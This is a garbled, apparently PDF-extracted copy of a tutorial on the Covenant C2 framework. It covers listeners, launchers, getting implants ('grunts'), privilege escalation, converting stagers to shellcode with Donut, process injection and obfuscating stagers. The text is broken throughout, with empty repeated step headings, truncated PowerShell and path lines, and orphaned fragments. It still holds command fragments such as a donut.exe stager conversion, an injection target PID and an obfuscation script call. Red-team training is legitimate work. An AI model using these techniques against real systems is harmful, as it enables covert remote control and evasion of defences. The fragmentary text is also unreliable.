A New PowerShell Empire - The Covenant C2 Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 2/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
Table of Contents
1. Here’s What You Need
2. Installation
3. Docker Installation
4. Adding Encryption
5. Listeners
6. Launchers
7. Getting a Grunt
8. Interacting with Grunts
9. Use Covenant for Priv Escalation
10. Grunt Taskings
11. How to Use Donut with Covenant
12. Use Donut 0.9.3
13. Alternatives To Compiling Donut
14. Inject A Covenant Stager PIC
15. How To Obfuscate Grunt Stagers
16. How To Import PowerShell Into Covenant
17. How To Use Covenant With Evil-WinRM
INSTALLATION
The first step to install Covenant is to
download the dotnet-sdk.
DOCKER INSTALLATION
If you are inclined to, you can install Covenant
using the Docker image, although I don’t find
the normal installation to be very difficult.
ADDING ENCRYPTION
Covenant connections are encrypted by
default. Let me say that again, by default
network traffic from Covenant is encrypted.
LISTENERS
Covenant listeners are the configured
listening interfaces for Covenant to phone
back home to once its grunts are active.
LAUNCHERS
In the Covenant architecture launchers are
used to create grunts. They launch attacks
on the targets.
GETTING A GRUNT
In order to get a grunt I copied the generated
PowerShell launcher command and hosted it
on a Python webserver on my Kali VM.
it immediately.
GRUNT TASKINGS
The Grunt Taskings tab shows the requested
tasks given to grunts.
Step 1.
Step 2.
Step 3.
Step 2.
Step 3.
donut.exe -f GruntStager.exe -a 2
loader.exe instance
ALTERNATIVES TO COMPILING DONUT
Instead of compiling Donut and deciding
which version to use there is a convenient
method for creating PIC called donut-maker.py.
PS C:\Users\bob.bob> [System.Conv
C:\Users\bob.bob\source\repos\G
"C:\Program Files\Internet Explorer\iexplore.exe" 2624
python3 obfuscate.py gruntstager.cs